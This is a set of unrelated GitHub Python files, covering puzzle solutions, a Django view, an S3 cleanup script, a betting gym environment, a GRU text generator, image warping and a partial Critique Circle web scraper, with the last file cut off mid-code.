0\n instructions = []\n\n while rotations < 4:\n orientation, r, c = state\n dr, dc = orientations[orientation]\n next_r, next_c = r + dr, c + dc\n if (\n next_r not in range(len(grid))\n or next_c not in range(len(grid[next_r]))\n or grid[next_r][next_c] != \"#\"\n or (prev_state and prev_state[1:] == (next_r, next_c))\n ):\n rotations += 1\n state = (rotated(orientation), r, c)\n else:\n if rotations:\n instructions.append({1: \"L\", 3: \"R\"}[rotations])\n if not instructions or not isinstance(instructions[-1], int):\n instructions.append(0)\n instructions[-1] += 1\n 
rotations = 0\n prev_state = state\n state = (orientation, next_r, next_c)\n\n return instructions\n\n\ndef find_pattern_sequence(patterns, data):\n result = []\n i = 0\n while i < len(data):\n for pattern_idx, pattern in enumerate(patterns):\n if data[i : i + len(pattern)] == pattern:\n i += len(pattern)\n result.append(pattern_idx)\n break\n else:\n return None\n return result\n\n\ndef find_patterns(data, num_patterns=3):\n if num_patterns == 0:\n return ([], []) if not data else None\n for pattern_len in range(10, 1, -2):\n pattern = data[:pattern_len]\n rest = []\n i = 0\n while i < len(data):\n if data[i : i + pattern_len] == pattern:\n i += pattern_len\n else:\n rest.append(data[i])\n i += 1\n next_result = find_patterns(rest, num_patterns - 1)\n if next_result is not None:\n other_patterns = next_result[0]\n all_patterns = [pattern] + other_patterns\n pattern_sequence = find_pattern_sequence(all_patterns, data)\n if pattern_sequence:\n return all_patterns, pattern_sequence\n\n\ndef part2(grid, data):\n instructions = find_instructions(grid)\n patterns, sequence = find_patterns(instructions)\n\n main_routine = [\n ord(c) for c in \",\".join(chr(ord(\"A\") + i) for i in sequence) + \"\\n\"\n ]\n function_a = [ord(c) for c in \",\".join(str(x) for x in patterns[0]) + \"\\n\"]\n function_b = [ord(c) for c in \",\".join(str(x) for x in patterns[1]) + \"\\n\"]\n function_c = [ord(c) for c in \",\".join(str(x) for x in patterns[2]) + \"\\n\"]\n output_opt = [ord(c) for c in \"n\\n\"]\n\n data[0] = 2\n computer = Computer(data)\n\n for value in main_routine + function_a + function_b + function_c + output_opt:\n computer.input(value)\n print(computer.run())\n\n\ndef main(grid, data):\n part1(grid)\n part2(grid, data)\n\n\nif __name__ == \"__main__\":\n from input import day17\n\n data = [int(c) for c in day17.split(\",\")]\n computer = Computer(data)\n grid_str = \"\".join(chr(i) for i in computer).strip()\n grid = grid_str.splitlines()\n main(grid, data)\n","repo_name":"cspickert/advent-of-code-2019","sub_path":"day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":3909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74213173688","text":"'''\r\nUnittests for PrimeMover.py\r\nDecember 2020 Jakub Kazimierski\r\n'''\r\n\r\nimport unittest\r\nimport PrimeMover\r\n\r\nclass test_PrimeMover(unittest.TestCase): \r\n '''\r\n Class with unittests for PrimeMover.py\r\n '''\r\n\r\n # region Unittests\r\n def test_ExpectedOutput(self):\r\n '''\r\n Checks if returned output is as expected.\r\n '''\r\n output = PrimeMover.PrimeMover(16)\r\n self.assertEqual(output, 53)\r\n\r\n # endregion\r\n\r\nif __name__ == \"__main__\":\r\n '''\r\n Main method for test cases.\r\n '''\r\n unittest.main()","repo_name":"JakubKazimierski/PythonPortfolio","sub_path":"Coderbyte_algorithms/Medium/PrimeMover/test_PrimeMover.py","file_name":"test_PrimeMover.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"77"} +{"seq_id":"4881176441","text":"import uuid\nfrom django.views.generic import DetailView\n\nfrom .models import UserProfileInfo\nfrom users.models import CustomUser\n\nfrom django.shortcuts import (\n redirect,\n render,\n get_object_or_404,\n HttpResponseRedirect,\n reverse\n)\n\nfrom .forms import SaveProfileForm\n\n\n\ndef detailUserProfileInfo(request, pk):\n\n \"\"\" Shows detailView of User\"\"\"\n\n\n a = 
UserProfileInfo.objects.filter(id_id=request.user.id)\n user_profile_info = None\n if not a:\n message = 'Profile not edited'\n else:\n user_profile_info = a[0]\n message = 'Profile edited'\n\n\n \n custom_user = CustomUser.objects.filter(id=request.user.id)[0]\n\n if request.method == \"POST\" and not a:\n form = SaveProfileForm(request.POST, request.FILES)\n if form.is_valid():\n \n User_image = form.cleaned_data['User_image']\n\n profile = form.save(commit=False)\n profile.first_name = request.user.first_name\n profile.last_name = request.user.last_name\n profile.id_id = request.user.id\n profile.save()\n \n\n if User_image:\n\n user_thumbnail = CustomUser.objects.get(id=request.user.id)\n user_thumbnail.image_thumbnail = User_image\n user_thumbnail.save()\n \n \n \n return redirect('user_profile_info', pk=profile.pk)\n\n else:\n print(form.errors)\n message = form.errors\n return render(request, \"message/error.html\", {'message': message})\n\n elif a:\n \"\"\" As Profile edited for the first time now when user click edit profile this \n section of code will run and will update the data.\"\"\"\n\n\n # fetch the object related to passed pk\n obj = get_object_or_404(UserProfileInfo, pk = pk)\n \n if request.method == \"POST\":\n \n # pass the object as instance in form \n form = SaveProfileForm(request.POST, request.FILES, instance=obj) \n \n # save the data from the form and \n # redirect to detail_view \n if form.is_valid(): \n User_image = form.cleaned_data['User_image']\n\n profile = form.save(commit=False)\n profile.id_id = request.user.id\n profile.save()\n \n\n if User_image:\n\n user_thumbnail = CustomUser.objects.get(id=request.user.id)\n user_thumbnail.image_thumbnail = User_image\n user_thumbnail.save()\n\n\n \n return redirect('user_profile_info', pk=pk) # Calling via url name\n else:\n print(form.errors)\n message = form.errors\n return render(request, \"message/error.html\", {'message': message})\n else:\n form = SaveProfileForm(instance=obj)\n #return render(request, \"user_profile/user_profile.html\", {'form':form})\n\n \n else:\n \"\"\"As profile not edited yet for the first time so only going to render the form\"\"\"\n form = SaveProfileForm()\n\n \n \n return render(request, 'user_profile/user_profile.html', {'custom_user': custom_user, 'message': message,\n 'user_profile_info':user_profile_info, 'form':form})\n\n\n\ndef getUseridFromApplicantList(request):\n Applicant_id = request.POST.get('id')\n #join_result = UserProfileInfo.objects.select_related('id')\n User_uuid = UserProfileInfo.objects.filter(id_id=Applicant_id).values('u_id')\n\n return redirect('detailProfileViewForPublic', User_uuid[0][\"u_id\"])\n\n\ndef detailProfileViewForPublic(request, pk):\n User_id = UserProfileInfo.objects.filter(u_id=pk).values('id_id')[0][\"id_id\"]\n join_result = UserProfileInfo.objects.filter(id_id=User_id).select_related()[0]\n\n return render(request, 'user_profile/user_profile_for_public.html', {'join_result': join_result})\n\n\n\n\n\n\n\n\n\ndef GetUserProfileUuId(request):\n profile_uuid = UserProfileInfo.objects.filter(id_id=request.user.id).values('u_id')\n\n if not profile_uuid:\n user_uuid = CustomUser.objects.filter(id=request.user.id).values('uuid')\n return redirect('user_profile_info', user_uuid[0][\"uuid\"])\n else:\n return redirect('user_profile_info', 
profile_uuid[0][\"u_id\"])\n\n\n","repo_name":"BarunBlog/Link_People","sub_path":"user_profile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73651322169","text":"#!/bin/env python3\n\nfrom datetime import datetime, timezone\nimport os\nimport boto3\n\n\ndef delete_s3_objects():\n bucket = os.getenv('AWS_S3_BUCKET')\n dry_run = os.getenv('DRYRUN', '0')\n dry_run = int(dry_run)\n\n delete_until = os.getenv('DELETE_UNTIL_DATE')\n if delete_until:\n delete_until = datetime.strptime(delete_until, '%Y-%m-%d %H:%M:%S')\n else:\n delete_until = datetime.now()\n\n delete_until = delete_until.replace(tzinfo=timezone.utc)\n\n print(f\"Deleting all objects from s3 bucket {bucket} until {delete_until} (dry-run: {dry_run})\")\n s3 = boto3.resource('s3')\n bucket = s3.Bucket(bucket)\n\n for obj in bucket.objects.all():\n if obj.last_modified < delete_until:\n if dry_run > 0:\n print(f\"(dry-run) deleting {obj.key}\")\n else:\n print(f\"deleting {obj.key}\")\n obj.delete()\n\n\nif __name__ == '__main__':\n delete_s3_objects()\n","repo_name":"openshift-assisted/assisted-events-scrape","sub_path":"assisted-events-scrape/ccx_export/delete_from_ccx_s3_bucket.py","file_name":"delete_from_ccx_s3_bucket.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70961173369","text":"from gym import Env, logger\nfrom gym import spaces\nfrom gym.utils import colorize, seeding\nimport numpy as np\nfrom six import StringIO\nimport sys\nimport math\nimport pandas as pd\nfrom network import Network\n\nclass FA_Env(Env):\n\n def __init__(self):\n self.matches, self.results, self.odds = self.getSeason('recent_seasons_filled_unnormalized.csv', 'recent_seasons_PCA_99_pct_44_components.csv')\n\n #print(self.matches)\n self.match_index = None\n self.match = None\n self.match_winner = None\n\n\n self.cash = 50\n\n self.action_space = spaces.Tuple((spaces.Discrete(math.floor(self.cash + 1)), spaces.Discrete(3)))\n\n self.observation = 0\n\n BetNet = Network(self.matches.shape[1])\n BetNet.load_weights(\"weights-improvement-100-0.52.hdf5\")\n\n self.predictions = np.zeros(self.results.shape)\n for r in range(self.matches.shape[0]):\n match = self.matches[r]\n self.predictions[r] = BetNet.model.predict(np.array([match]))[0]\n\n\n def step(self, action):\n assert self.action_space.contains(action)\n bet_amount, bet_team = action\n\n #Determine rewards, update cash\n reward = 0\n done = False\n lastCash = self.cash\n curr_odds = self.odds[self.match_index][bet_team]\n if bet_team == self.match_winner:\n self.cash += bet_amount * (curr_odds - 1)\n else:\n self.cash -= bet_amount\n\n reward = self.cash - lastCash\n if self.cash <= 1 or self.match_index >= self.matches.shape[0]-1:\n done = True\n # reward = self.cash\n\n\n #Update the State\n #set match index += 1\n #set match = self.matches[self.match_index]\n #update match_winner\n if not done:\n self.match_index += 1\n self.match = self.matches[self.match_index]\n self.match_odds = self.odds[self.match_index]\n self.match_predictions = self.predictions[self.match_index]\n self.match_winner = self.getMatchWinner()\n self.action_space = spaces.Tuple((spaces.Discrete(math.floor(self.cash + 1)), spaces.Discrete(3)))\n\n return (self.match_predictions, self.match_odds, self.cash), reward, done, {\"cash\": self.cash}\n\n\n def reset(self):\n 
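# start a fresh episode: rewind to the first match of the season and\n        # restore the starting bankroll\n        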
self.match_index = 0\n self.match = self.matches[self.match_index]\n self.match_odds = self.odds[self.match_index]\n self.match_predictions = self.predictions[self.match_index]\n self.match_winner = self.getMatchWinner()\n\n self.cash = 50\n self.observation = 0\n self.action_space = spaces.Tuple((spaces.Discrete(self.cash + 1), spaces.Discrete(3)))\n\n return (self.match_predictions, self.match_odds, self.cash)\n\n def getSeason(self, match_source, NN_train_source):\n\n top_odds_per_match = pd.read_csv(\"data/recent_seasons_max_odds.csv\")\n print(\"LOADING DATA...\")\n x = pd.read_csv('data/recent_seasons_PCA_99_pct_44_components.csv')\n\n\n y = pd.read_csv('data/labels_recent_seasons.csv')\n #print( x, y)\n x = x.as_matrix()\n y = y.as_matrix()\n top_odds_per_match = top_odds_per_match.as_matrix()\n return x, y, top_odds_per_match\n\n\n def getMatchWinner(self):\n winner_index, = np.where(self.results[self.match_index] == 1)\n return winner_index\n\n\n#######################################################################################\n#\n#\n#\n#\n#\n########################################################################################\n# TODO DQN ENV\n","repo_name":"zsimone10/FIFABets","sub_path":"env/faenv.py","file_name":"faenv.py","file_ext":"py","file_size_in_byte":3574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"17161056035","text":"import numpy as np\n\nfrom .warp_image import warp_images\n\n\ndef _get_regular_grid(image, points_per_dim):\n nrows, ncols = image.shape[0], image.shape[1]\n rows = np.linspace(0, nrows, points_per_dim)\n cols = np.linspace(0, ncols, points_per_dim)\n rows, cols = np.meshgrid(rows, cols)\n return np.dstack([cols.flat, rows.flat])[0]\n\n\ndef _generate_random_vectors(image, src_points, scale):\n dst_pts = src_points + np.random.uniform(-scale, scale, src_points.shape)\n return dst_pts\n\n\ndef _thin_plate_spline_warp(image, src_points, dst_points, keep_corners=True):\n width, height = image.shape[:2]\n if keep_corners:\n corner_points = np.array(\n [[0, 0], [0, width], [height, 0], [height, width]])\n src_points = np.concatenate((src_points, corner_points))\n dst_points = np.concatenate((dst_points, corner_points))\n out = warp_images(src_points, dst_points,\n np.moveaxis(image, 2, 0),\n (0, 0, width - 1, height - 1))\n return np.moveaxis(np.array(out), 0, 2)\n\n\ndef tps_warp(image, points_per_dim, scale):\n width, height = image.shape[:2]\n src = _get_regular_grid(image, points_per_dim=points_per_dim)\n dst = _generate_random_vectors(image, src, scale=scale*width)\n out = _thin_plate_spline_warp(image, src, dst)\n return out\n\ndef tps_warp_2(image, dst, src):\n out = _thin_plate_spline_warp(image, src, dst)\n return out","repo_name":"eliahuhorwitz/DeepSIM","sub_path":"util/tps_warp.py","file_name":"tps_warp.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":412,"dataset":"github-code","pt":"77"} +{"seq_id":"25986448377","text":"# Import needed modules\nimport string\nimport datetime\nimport random\nimport time\nimport re\n\n\n# Declare some needed variables\n# time_range = overall time range to be searched\n# time_crystals = discrete buckets of time you want to chunk the search into (extra points for the Star Trek reference!)\ntime_earliest = 201\ntime_latest = 1\ntime_diff = time_earliest-time_latest\ntime_crystals = 50\nnum_jobs = time_diff/time_crystals\nnum_jobs = int(round(num_jobs))\n\nprint(\"Earliest in 
seconds\")\nprint(time_earliest)\nprint(\"Latest in seconds\")\nprint(time_latest)\nprint(\"Diff in seconds\")\nprint(time_diff)\nprint(\"Time buckets\")\nprint(time_crystals)\nprint(\"Final number of jobs\")\nprint(num_jobs)\n\nsearch_job = \"index=_internal | stats count\"\nstr(search_job)\n\nfor x in range(num_jobs):\n y = time_earliest-time_crystals\n z = time_earliest+time_crystals\n if y < time_earliest:\n y = y-(time_crystals*x)\n z = z-(time_crystals*x)\n print(\"job number \" + str(x) + \" Runs search: latest=-\" + str(y) + \"s \" + \"earliest=-\" + str(z) + \"s \" + str(search_job))\n","repo_name":"klawrencegupta-splunk/scripts","sub_path":"exporter.py","file_name":"exporter.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"14944463822","text":"import re\n\n\ndef solve_regex(string):\n N = len(string) // 2 # 1\n\n return sum(int(a) for a, b in zip(string, string[N:]+string[:N]) if a == b)\n\n\nwith open('input.txt') as f:\n data = f.read().strip()\n\n\nprint(solve_regex(data))\n","repo_name":"antonsandberg/Advent-of-Code-2017","sub_path":"Day 1/Day 1.py","file_name":"Day 1.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27322531099","text":"class Solution:\n def sortItems(self, n: int, m: int, group: List[int], beforeItems: List[List[int]]) -> List[int]:\n items_graph = defaultdict(list)\n \n group_graph = defaultdict(list)\n \n indegrees_items = defaultdict(int)\n \n indegrees_groups = defaultdict(int) \n \n # to create group for ungrouped \n for i in range(len(group)):\n if group[i] == -1:\n group[i] = m\n m += 1\n \n for node, prereq in enumerate(beforeItems):\n node_group = group[node]\n \n for pn in prereq:\n items_graph[pn].append(node)\n indegrees_items[node] += 1\n \n ns_group = group[pn] \n \n if ns_group != node_group:\n group_graph[ns_group].append(node_group)\n indegrees_groups[node_group] += 1\n \n \n \n# print(indegrees_items)\n# print(items_graph)\n \n# print(indegrees_groups)\n# print(group_graph)\n \n \n # determine group order and also check if it has cycle \n group_order = []\n \n queue = deque()\n for grp in range(m):\n if indegrees_groups[grp] == 0:\n queue.append(grp) \n \n \n while queue:\n current = queue.popleft()\n \n group_order.append(current)\n \n for nbr in group_graph[current]:\n indegrees_groups[nbr] -= 1\n \n if indegrees_groups[nbr] == 0:\n queue.append(nbr)\n \n if len(group_order) < m:\n return []\n \n \n items_order = []\n \n queue = deque()\n for item in range(n):\n if indegrees_items[item] == 0:\n queue.append(item)\n \n \n while queue:\n current = queue.popleft()\n\n items_order.append(current)\n\n for nbr in items_graph[current]:\n indegrees_items[nbr] -= 1\n\n if indegrees_items[nbr] == 0:\n queue.append(nbr)\n \n if len(items_order) < n:\n return []\n \n \n # group : items ordered\n all_order = defaultdict(list)\n \n for item in items_order:\n item_group = group[item]\n all_order[item_group].append(item)\n \n \n actual_order = []\n \n for grp in group_order: \n actual_order.extend(all_order[grp])\n \n \n return 
actual_order","repo_name":"meraf00/Competitive-Programming","sub_path":"1203-sort-items-by-groups-respecting-dependencies/1203-sort-items-by-groups-respecting-dependencies.py","file_name":"1203-sort-items-by-groups-respecting-dependencies.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42819271335","text":"import torch\r\nimport pickle\r\nimport numpy as np\r\nimport torch.nn as nn\r\n\r\n\r\nclass Params:\r\n def __init__(self):\r\n self.filename = \"data.txt\" # 源文件\r\n self.w2v_filename = \"w2v.pkl\" # w2v文件\r\n self.model_filename = 'model.pth' # 模型存储位置\r\n self.device = \"cuda\" if torch.cuda.is_available () else \"cpu\"\r\n self.embedded_size = 256 # 每一个字从w2v算出来是[1 , embedded_size]向量\r\n self.word_size = 0 # w1算出来\r\n self.cut_size = 500 # 训练文段的长度\r\n self.batch_size = 32 # batch大小\r\n self.hidden_size = 128 # 中间层大小\r\n self.epochs = 500 # 学习次数\r\n self.lr = 0.1 # 学习率\r\n\r\n\r\nclass GruModel ( nn.Module ):\r\n def __init__(self):\r\n super ( GruModel , self ).__init__ ()\r\n self.embedded_size = params.embedded_size\r\n self.hidden_size = params.hidden_size\r\n self.word_size = params.word_size\r\n self.gru = nn.GRU ( input_size=self.embedded_size , hidden_size=self.hidden_size , batch_first=True )\r\n self.flatten = nn.Flatten ( 0 , 1 )\r\n self.linear = nn.Linear ( self.hidden_size , self.word_size )\r\n self.cross_entropy = nn.CrossEntropyLoss ()\r\n\r\n def forward(self , x_embedded , h0):\r\n x_embedded = x_embedded.to ( params.device )\r\n h0 = h0.to ( params.device )\r\n # x_embedded的形状:[batch , cut_size , embedded_size]\r\n hidden , hn = self.gru ( x_embedded , h0 )\r\n # hidden的形状:[batch , cut_size , hidden_size]\r\n flatten = self.flatten ( hidden )\r\n # flatten的形状:[batch x cut_size , hidden_size]\r\n predict = self.linear ( flatten )\r\n # pre的形状:[batch x cut_size , word_size]\r\n return predict , hn\r\n\r\n def init_h0(self , batch_size):\r\n return torch.zeros ( (1 , batch_size , self.hidden_size) , device=params.device )\r\n\r\n\r\ndef generator(length , starts):\r\n h = model.init_h0 ( 1 )\r\n h = h.to ( params.device )\r\n result = \"\"\r\n result += starts\r\n word_index = word_to_index[ \"。\" ]\r\n # 预热\r\n for prefix in starts:\r\n if prefix in word_to_index.keys ():\r\n word_index = word_to_index[ prefix ]\r\n word_embedded = w1[ word_index ].reshape ( 1 , 1 , -1 )\r\n word_embedded = torch.tensor ( word_embedded )\r\n prediction , h = model ( word_embedded , h )\r\n for i in range ( length ):\r\n word_embedded = w1[ word_index ].reshape ( 1 , 1 , -1 )\r\n word_embedded = torch.tensor ( word_embedded )\r\n prediction , h = model ( word_embedded , h )\r\n word_index = int ( torch.argmax ( prediction ) )\r\n word = index_to_word[ word_index ]\r\n result += word\r\n print ( result )\r\n\r\n\r\nif __name__ == '__main__':\r\n params = Params ()\r\n model = torch.load ( params.model_filename , map_location=params.device )\r\n w1 , word_to_index , index_to_word = pickle.load ( open ( \"w2v.pkl\" , \"rb\" ) )\r\n while True:\r\n starts = input ( \"请输入主题:\" )\r\n length = input ( \"请输入长度:\" )\r\n try:\r\n length = int ( length )\r\n except:\r\n length = 200\r\n generator ( length , starts )\r\n","repo_name":"gaowenshuo/EsGenGpt","sub_path":"(Abandoned)EsGenLstm_predict.py","file_name":"(Abandoned)EsGenLstm_predict.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"77"} 
+{"seq_id":"7381840908","text":"import os\n\n\n# function implementing caesar cipher\ndef encrypt(text, s):\n result=\"\"\n # traverse text\n for i in range(len(text)):\n char = text[i]\n # Encrypt uppercase characters\n if (char.isupper()):\n result+= chr((ord(char) + s - 65) % 26 + 65)\n # Encrypt lowercase characters\n else:\n result+= chr((ord(char) + s - 97) % 26 + 97)\n return result\n\nif __name__ == '__main__':\n\n text=input(\"enter text to encrypt:\")\n s=int(input(\"enter shift:\"))\n print(\"encrypted text:\",encrypt(text,s))\n\n","repo_name":"joebeck20/College","sub_path":"SEM 4/Python/Worksheets/PS4/ps2_8.py","file_name":"ps2_8.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9783096259","text":"from selenium import webdriver\nfrom time import sleep\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.common.exceptions import NoSuchElementException\n\nfrom sys import platform\nimport sys\n\n\nfrom database import *\nfrom scraper_classes import *\n\nimport multiprocessing as mp\n\nimport threading\n\nimport csv\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-sm\", \"--skip-metadata\", action='store_true', help=\"Skip metadata scraping\")\nparser.add_argument(\"-sc\", \"--skip-critique\", action='store_true', help=\"Skip critique scraping\")\n\n\ncc_up_for_review_url = \"https://www.critiquecircle.com/queue.asp?status=1\"\ncc_upcoming_url = \"https://www.critiquecircle.com/queue.asp?status=2\"\ncc_older_stories_url = \"https://www.critiquecircle.com/queue.asp?status=3\"\ncc_options_url = \"https://www.critiquecircle.com/queue.asp?action=options\"\n\n# NOTE(JR): Given the naming scheme, I have to assume these ids are\n# extremely liable to be changed. 
This should be considered fragile\n# These are used to ID tables in the old stories page\nmetadata_tables = [\n \"newbie_queue_metadata\",\n \"general_metadata\",\n \"fantasy_metadata\",\n \"scifi_metadata\",\n \"romance_metadata\",\n \"ya_metadata\",\n \"suspense_metadata\"\n]\n\ntable_ids = [\n \"queue_349\", # newbie queue\n \"queue_1\", # general\n \"queue_7\", # fantasy\n \"queue_1247\", # scifi\n \"queue_8\", # romance\n \"queue_26\", # ya\n \"queue_540\" # suspense\n]\n\nblock_ids = [\n \"qd349\", # newbie queue\n \"qd1\", # general\n \"qd7\", # fantasy\n \"qd1247\", # scifi\n \"qd8\", # romance\n \"qd26\", # ya\n \"qd540\" # suspense\n]\n\n# CSV files do *not* like having line breaks in their stored strings\n# A standard workaround is to replace \"\\n\" with an uncommonly used symbol\n# I picked the Ϯ (coptic capital letter dei) as it seemed unlikely to\n# appear in our data set\nline_break_replacement = \"\\u03EE\"\n\n\ndef login(driver):\n # IMPORTANT(JR): please enter your own cc email and password\n # moreover, please do not commit your user/pass to the repo\n user = ''\n password = ''\n\n driver.get('https://new.critiquecircle.com/login')\n\n username_box = driver.find_element_by_xpath(\"//input[@type='username']\")\n username_box.send_keys(user)\n\n password_box = driver.find_element_by_xpath(\"//input[@type='password']\")\n password_box.send_keys(password)\n\n login_box = driver.find_element_by_xpath(\"//button[@type='submit']\")\n login_box.click()\n\n\ndef get_next_button(driver, block_id):\n return driver.find_element_by_css_selector(\"#\" + block_id + \" table.FaintBorderBlue td.smalltext:nth-of-type(2) a:nth-last-child(2)\")\n\ndef process_metadata_row(metadata, row):\n # Critique circle allows users to lock content away from accounts that haven't reviewed other stories\n # Assuming that our scraper accounts haven't done any actual reviewing, I figured it best to skip\n locked_icons = row.find_elements_by_css_selector('td:nth-child(1) img[src*=\"images/shield_\"]')\n if len(locked_icons) > 0:\n return \"skipped\"\n\n story_title = row.find_element_by_css_selector(\"td:nth-child(1)\").text\n story_link = row.find_element_by_css_selector(\"td:nth-child(1) a\").get_attribute('href')\n\n author = row.find_element_by_css_selector(\"td:nth-child(2) a.hoverlink span\").text\n author_link = row.find_element_by_css_selector(\"td:nth-child(2) a.hoverlink\").get_attribute('href')\n\n word_count = int(row.find_element_by_css_selector(\"td:nth-child(4) nobr\").text.replace(\",\", \"\"))\n\n genre = row.find_element_by_css_selector(\"td:nth-child(5) nobr\").text\n\n crit_count = int(row.find_element_by_css_selector(\"td:nth-child(6) nobr\").text)\n\n sm = StoryMetadata(story_title, story_link, author, author_link, word_count, genre, crit_count)\n metadata.append(sm)\n\n return \"added\"\n\ndef gather_metadata(driver, table_name, table_id, block_id):\n driver.get(cc_options_url)\n type_checkbox = driver.find_element_by_css_selector(\"input#Type\")\n if type_checkbox.is_selected() is False:\n type_checkbox.click()\n\n # Load up main queue page\n driver.get(cc_older_stories_url)\n metadata = list()\n\n next_button = get_next_button(driver, block_id)\n pagination_count = 0\n\n #while next_button and pagination_count <= 0:\n while next_button:\n table = driver.find_element_by_css_selector(\"#\" + table_id)\n\n for row in table.find_elements_by_css_selector(\"tr.or\"):\n process_metadata_row(metadata, row)\n\n # preparation for next loop iteration\n if next_button:\n next_button.click()\n 
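# the click repaginates the table, so re-resolve the handle to avoid\n            # a stale element reference\n            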
next_button = get_next_button(driver, block_id)\n if next_button.text != \">>\":\n break\n pagination_count += 1\n else:\n break\n\n return metadata\n\ndef process_row_metadata(driver, metadata):\n stories = list()\n for m in metadata:\n driver.get(m.story_link)\n\n # The forbidden icon appears on 18+ pages, which we're skipping\n forbidden_icon = driver.find_elements_by_css_selector('img[src*=\"images/forbidden\"]')\n if len(forbidden_icon) > 0:\n continue\n\n author_notes = \"\"\n try:\n author_notes = driver.find_element_by_css_selector(\".authornotes\").text \\\n .replace(\"\\n\", line_break_replacement)\n # .replace(\"\\n\", line_break_replacement).encode('utf-8')\n except NoSuchElementException:\n author_notes = \"\"\n story_chunks = driver.find_elements_by_css_selector(\"#story p\")\n story_text = \"\"\n for sc in story_chunks:\n story_text += sc.text.strip()\n story_text += \"\\n\"\n #story_text = story_text.replace(\"\\n\", line_break_replacement).encode('utf-8')\n story_text = story_text.replace(\"\\n\", line_break_replacement)\n\n story_id = str(hash(m.author + m.story_title) + sys.maxsize + 1)\n \n story = FullStoryMetadata(\n story_id,\n m.author,\n m.author_link,\n m.story_title,\n m.story_link,\n m.word_count,\n m.genre,\n m.crit_count,\n author_notes,\n story_text\n )\n stories.append(story)\n\n return stories\n\ndef run_metadata_scraper_manager(table_name, table_id, block_id):\n options = webdriver.ChromeOptions()\n options.add_argument(\"--disable-extensions\")\n options.add_argument(\"--disable-gpu\")\n options.add_argument(\"--headless\")\n if platform == \"linux\" or platform == \"linux2\":\n options.add_argument(\"--no-sandbox\")\n \n driver = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=options)\n\n # Per Table Scraping Options\n login(driver)\n row_metadata = gather_metadata(driver, table_name, table_id, block_id)\n full_metadata = process_row_metadata(driver, row_metadata)\n insert_story_metadata(table_name, full_metadata)\n\n driver.quit()\n\ndef run_threaded_metadata_scraper():\n processes = []\n for i in range(len(metadata_tables)):\n #for i in range(1):\n p = mp.Process(target=run_metadata_scraper_manager, args=(metadata_tables[i], table_ids[i], block_ids[i]))\n processes.append(p)\n p.start()\n\n for p in processes:\n p.join()\n\ndef run_critique_scraper_manager(table_name):\n options = webdriver.ChromeOptions()\n options.add_argument(\"--disable-extensions\")\n options.add_argument(\"--disable-gpu\")\n options.add_argument(\"--headless\")\n if platform == \"linux\" or platform == \"linux2\":\n options.add_argument(\"--no-sandbox\")\n \n driver = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=options)\n \n login(driver)\n metadata = get_stored_metadata(table_name)\n\n critiques = []\n for m in metadata:\n driver.get(m.story_link)\n\n # update metadata entry to say it's processed\n update_metadata(table_name, m.story_id)\n\n # The forbidden icon appears on 18+ pages, which we're skipping\n forbidden_icon = driver.find_elements_by_css_selector('img[src*=\"images/forbidden\"]')\n if len(forbidden_icon) > 0:\n continue\n\n critique_table = driver.find_element_by_css_selector(\".tablecls\")\n\n for row in critique_table.find_elements_by_css_selector(\"tr.or, tr.er\"):\n # The HTML used for display the critiques in a table is quite gnarly\n # Specifically, tr.or -or- tr.er could be the last row, which doesn't\n # have 5 columns but instead just one with a link, this bit tests for \n # the last row and moves on if that's the 
case\n            last_row_text_check = row.find_element_by_css_selector(\"td:nth-child(1) a\").text\n            if last_row_text_check == \"View all Inline Critiques together\":\n                continue\n\n            # Doing type first because if it's classic we're skipping\n            critique_type = row.find_element_by_css_selector(\"td:nth-child(5)\").text\n            if critique_type == \"Classic\":\n                continue\n\n            critique_link = row.find_element_by_css_selector(\"td:nth-child(1) nobr a\").get_attribute('href')\n            word_count = row.find_element_by_css_selector(\"td:nth-child(4)\").text\n\n            # The try/except is necessary here because an Anonymous critique won't have an anchor tag\n            # for the scraper to find\n            critic_name = \"\"\n            critic_link = \"\"\n            try:\n                critic_name = row.find_element_by_css_selector(\"td:nth-child(2) a\").text\n                critic_link = row.find_element_by_css_selector(\"td:nth-child(2) a\").get_attribute('href')\n            except NoSuchElementException:\n                critic_name = 'Anonymous'\n                critic_link = 'None'\n\n            cm = CritiqueMetadata(\n                m.story_id,\n                critic_name, \n                critic_link, \n                critique_link, \n                word_count, \n                critique_type\n            )\n            critiques.append(cm)\n\n    filled_critiques = []\n    for critique in critiques:\n        driver.get(critique.critique_link)\n\n        comments = driver.find_elements_by_css_selector('div[id^=\"c_\"]')\n        for c in comments:\n            comment_text = c.text.replace(\"\\n\", line_break_replacement)\n            comment_num = c.get_attribute('id').replace(\"c_\", \"\")\n            comment_target = driver.find_element_by_xpath(\"//p[@onclick=\\\"ToggleComment(this, \" + comment_num + \");\\\"]\")\n            target_text = comment_target.text.replace(\"\\n\", line_break_replacement)\n\n            fc = FullCritique(\n                critique.submission_id,\n                critique.critic_name, \n                critique.critic_link, \n                critique.critique_link, \n                critique.word_count, \n                critique.critique_type,\n                